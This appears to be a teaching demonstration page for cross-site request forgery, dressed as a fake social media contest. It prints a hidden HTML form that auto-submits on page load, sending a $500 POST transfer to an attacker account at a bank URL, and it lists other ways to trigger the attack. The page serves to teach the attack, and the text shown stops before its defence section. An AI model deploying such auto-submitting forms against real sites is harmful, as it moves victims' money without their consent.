Social Media Contest

⚠️ CSRF Attack Warning: This page contains hidden forms that will submit malicious requests!
If you're logged into the banking site, a $500 transfer may be executed.

🎯 POST-based CSRF Attack Status

Attack Type: Hidden Form Auto-Submit

Target Amount: $500

Method: POST request with form data

Status: Preparing attack...

📝 Enter the Contest (Fake Form)

Fill out this form to enter our amazing contest! (This is just a distraction)

🚨 Hidden CSRF Attack Forms

These forms are invisible and will auto-submit to perform CSRF attacks:

<!-- Hidden CSRF form that auto-submits -->
<form action="http://bank.com/transfer" method="POST" style="display:none;">
    <input type="hidden" name="to" value="attacker_account">
    <input type="hidden" name="amount" value="500">
    <input type="submit">
</form>

<script>
    // Auto-submit the form when page loads
    document.forms[0].submit();
</script>
            

🔍 How POST-based CSRF Works:

User visits malicious page (this contest page)
Hidden forms are automatically submitted via JavaScript
POST request sent to banking site with malicious data
Browser includes cookies automatically with the request
Banking server processes the POST as legitimate
Action executed without user consent (money transfer)

⚔️ Attack Variations:

🎯 Auto-submit on page load - Immediate attack
🎯 Submit on user interaction - Triggered by clicks
🎯 Multiple forms - Several attacks at once
🎯 Iframe submission - Hidden in invisible frame

🛡️ Why This Attack Works: